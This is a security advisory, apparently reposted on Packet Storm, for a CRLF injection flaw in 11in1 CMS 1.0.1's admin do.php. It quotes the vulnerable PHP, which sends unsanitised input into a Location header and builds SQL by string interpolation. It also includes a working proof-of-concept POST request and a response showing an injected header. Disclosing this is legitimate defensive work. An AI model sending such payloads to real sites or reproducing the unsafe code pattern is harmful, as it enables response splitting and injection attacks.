11in1 CMS version 1.0.1 suffers from a CRLF injection vulnerability in do.php.
e178c83e48311e4cfa9b508301cb4c7c
11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability
Vendor: 11in1
Product web page: http://www.11in1.org
Affected version: 1.0.1
Summary: Eleven in One is an open-source content management
system (CMS) that is powered by PHP and MySQL. It does not
only help you manage your personal blog but also maintain
your postings at social networks. By establishing consistency
among the data transmitted from and to the blog, this CMS
sustains continuous harmonization of your data over time.
Desc: Input passed to the 'content' parameter in 'do.php' on
line 2112 is not properly sanitised before being returned to
the user. This can be exploited to insert arbitrary HTTP
headers, which are included in a response sent to the user.
==============================================================
/admin/do.php:
--------------------------------------------------------------
2088: // update status
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))
2090: {
2091: $content = htmlspecialchars($_POST['content']);
2092:
2093: // Get database information
2094: $Database = new Database;
2095: $info = $Database->getInfo();
2096:
2097: // connect to database
2098: $conn = mysql_connect($info[0], $info[1], $info[2]);
2099: mysql_select_db($info[3], $conn);
2100:
2101: $date = date("Y-m-d H:i:s");
2102:
2103: // clear table
2104: $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");
2105:
2106: // close connection to db
2107: mysql_close($conn);
2108:
2109: // prepare success message
2110: $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);
2111:
2112: header("Location: msg.php?connect=yes&status=$content");
2113: }
==============================================================
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
MySQL 5.5.16
PHP 5.3.8
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab
Advisory ID: ZSL-2011-5055
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php
06.11.2011
------
POST /11in1/admin/do.php?action=postStatus HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
--
HTTP/1.1 302 Found
Date: Sun, 06 Nov 2011 18:53:29 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: msg.php?connect=yes&status=
ZSL-Custom-Header: love_injection
Content-Length: 1716
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!